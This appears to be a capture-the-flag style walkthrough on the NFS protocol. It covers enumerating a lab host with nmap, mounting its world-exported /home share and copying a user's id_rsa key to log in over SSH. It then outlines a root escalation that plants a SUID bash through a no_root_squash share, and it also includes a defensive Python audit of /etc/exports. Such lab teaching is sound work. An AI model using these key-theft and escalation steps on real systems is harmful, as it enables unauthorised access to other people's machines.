NFS

Understanding NFS
What is NFS?

NFS stands for "Network File System" and allows a system to share directories and files with others over a network. By using NFS, users and programs can access files on remote systems almost as if they were local files. It does this by mounting all, or a portion of a file system on a server. The portion of the file system that is mounted can be accessed by clients with whatever privileges are assigned to each file.

How does NFS work?


We don't need to understand the technical exchange in too much detail to be able to exploit NFS effectively; however, if this is something that interests you, I would recommend this resource: https://docs.oracle.com/cd/E19683-01/816-4882/6mb2ipq7l/index.html

First, the client will request to mount a directory from a remote host on a local directory just the same way it can mount a physical device. The mount service will then act to connect to the relevant mount daemon using RPC.

The server checks if the user has permission to mount whatever directory has been requested. It will then return a file handle which uniquely identifies each file and directory that is on the server.

If someone wants to access a file using NFS, an RPC call is placed to NFSD (the NFS daemon) on the server. This call takes parameters such as:

The file handle
The name of the file to be accessed
The user's user ID
The user's group ID

These are used to determine access rights to the specified file. This is what controls user permissions, i.e. reading and writing files.

What runs NFS?

Using the NFS protocol, you can transfer files between computers running Windows and other non-Windows operating systems, such as Linux, MacOS or UNIX.

A computer running Windows Server can act as an NFS file server for other non-Windows client computers. Likewise, NFS allows a Windows-based computer running Windows Server to access files stored on a non-Windows NFS server.

More Information:

Here are some resources that explain the technical implementation, and working of, NFS in more detail than I have covered here.

https://www.datto.com/library/what-is-nfs-file-share

http://nfs.sourceforge.net/

https://wiki.archlinux.org/index.php/NFS

Enumerating NFS
$ nmap -A -p-
Discovered open port 111/tcp on 10.10.212.47
Discovered open port 22/tcp on 10.10.212.47
Discovered open port 40979/tcp on 10.10.212.47
Discovered open port 2049/tcp on 10.10.212.47
Discovered open port 56897/tcp on 10.10.212.47
Discovered open port 38159/tcp on 10.10.212.47
Discovered open port 44707/tcp on 10.10.212.47

$ rustscan -i

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.76.50:22
Open 10.10.76.50:111
Open 10.10.76.50:2049
Open 10.10.76.50:37889
Open 10.10.76.50:38113
Open 10.10.76.50:39607
Open 10.10.76.50:45317
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-26 10:47 EST
Initiating Ping Scan at 10:47
Scanning 10.10.76.50 [2 ports]
Completed Ping Scan at 10:47, 0.10s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:47
Completed Parallel DNS resolution of 1 host. at 10:47, 0.03s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 10:47
Scanning 10.10.76.50 [7 ports]
Discovered open port 111/tcp on 10.10.76.50
Discovered open port 22/tcp on 10.10.76.50
Discovered open port 2049/tcp on 10.10.76.50
Discovered open port 39607/tcp on 10.10.76.50
Discovered open port 37889/tcp on 10.10.76.50
Discovered open port 38113/tcp on 10.10.76.50
Discovered open port 45317/tcp on 10.10.76.50
Completed Connect Scan at 10:47, 0.10s elapsed (7 total ports)
Nmap scan report for 10.10.76.50
Host is up, received conn-refused (0.100s latency).
Scanned at 2021-11-26 10:47:36 EST for 1s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
111/tcp open rpcbind syn-ack
2049/tcp open nfs syn-ack
37889/tcp open unknown syn-ack
38113/tcp open unknown syn-ack
39607/tcp open unknown syn-ack
45317/tcp open unknown syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.33 seconds

Command to list NFS shares; /home is the visible share, exported to every host (*):
$ /usr/sbin/showmount -e 10.10.76.50
Export list for 10.10.76.50:
/home *

Use the mount command to mount the NFS share on the local machine (the mount point /tmp/mount/ must already exist; the option is passed with -o):
$ sudo mount -t nfs 10.10.76.50:/home /tmp/mount/ -o nolock

Change directory to where you mounted the share. What is the name of the folder?
cappucino

List the folders inside and open .ssh.
id_rsa - a private key that can be used with ssh to access the IP without a password

Copy id_rsa to a different folder:
$ cp id_rsa /tmp/

chmod 600 (equivalent to chmod a+rwx,u-x,g-rwx,o-rwx) sets permissions so that the (U)ser/owner can read and write but not execute, while the (G)roup and (O)thers can neither read, write nor execute. ssh refuses to use a private key that is readable by other users, so this step is required.
$ chmod 600 id_rsa

SSH into the IP using the key:
$ ssh -i id_rsa cappucino@10.10.76.50

Exploiting NFS

NFS Access ->
Gain Low Privilege Shell ->
Upload Bash Executable to the NFS share ->
Set SUID Permissions Through NFS Due To Misconfigured Root Squash ->
Login through SSH ->
Execute SUID Bit Bash Executable ->
ROOT ACCESS
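A defensive check for the misconfiguration the chain above depends on, as an added example that is not from the original write-up: it parses an /etc/exports file (a constructed sample is embedded, with a first line matching the "/home *" export seen in showmount) and reports wildcard hosts, shares writable by any host, and no_root_squash, the option that lets a client's uid 0 stay root on the server.

```python
import re
from typing import Dict, List

# Constructed sample /etc/exports (not the target's real file); the first line
# mirrors the 'showmount -e' output above: /home exported to every host.
SAMPLE_EXPORTS = """\
# /etc/exports - constructed example
/home *(rw,sync,no_root_squash,no_subtree_check)
/srv/backup 192.168.1.0/24(ro,sync,root_squash)
/data 10.0.0.5(rw,sync,no_subtree_check)
"""

ALWAYS_RISKY = {
    "no_root_squash": "remote uid 0 stays root on the server, so SUID binaries can be planted",
    "insecure": "clients may use source ports above 1024, so unprivileged users can mount",
}

def parse_exports(text: str) -> Dict[str, List[Dict[str, object]]]:
    """Map each export path to its client entries: [{'host': str, 'opts': [str, ...]}, ...]."""
    exports: Dict[str, List[Dict[str, object]]] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()         # drop comments and blank lines
        if not line:
            continue
        parts = line.split()
        path, specs = parts[0], parts[1:] or ["*"]  # no client spec at all means "any host"
        entries = []
        for spec in specs:
            m = re.match(r"^([^(]*)(?:\((.*)\))?$", spec)
            if m is None:                           # malformed spec, skip it
                continue
            host = m.group(1) or "*"                # "(rw)" with no host also means any host
            opts = [o for o in (m.group(2) or "").split(",") if o]
            entries.append({"host": host, "opts": opts})
        exports[path] = entries
    return exports

def audit_exports(text: str) -> List[str]:
    """One finding per risky condition. root_squash is the default, so only its
    explicit removal (no_root_squash) is reported."""
    findings: List[str] = []
    for path, entries in parse_exports(text).items():
        for entry in entries:
            host, opts = entry["host"], entry["opts"]
            if host == "*":
                findings.append(f"{path}: exported to every host ('*')")
                if "rw" in opts:
                    findings.append(f"{path}: writable (rw) by any host")
            for opt in opts:
                if opt in ALWAYS_RISKY:
                    findings.append(f"{path} ({host}): {opt} - {ALWAYS_RISKY[opt]}")
    return findings

if __name__ == "__main__":
    for finding in audit_exports(SAMPLE_EXPORTS):
        print(finding)
```

Run it against a real file with audit_exports(open("/etc/exports").read()); an empty list means none of the checked conditions is present.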

The Executable

For compatibility reasons, we'll use a standard Ubuntu Server 18.04 bash executable, the same as the server's, as we know from our nmap scan. You can download it here: https://github.com/polo-sec/writing/blob/master/Security%20Challenge%20Walkthroughs/Networks%202/bash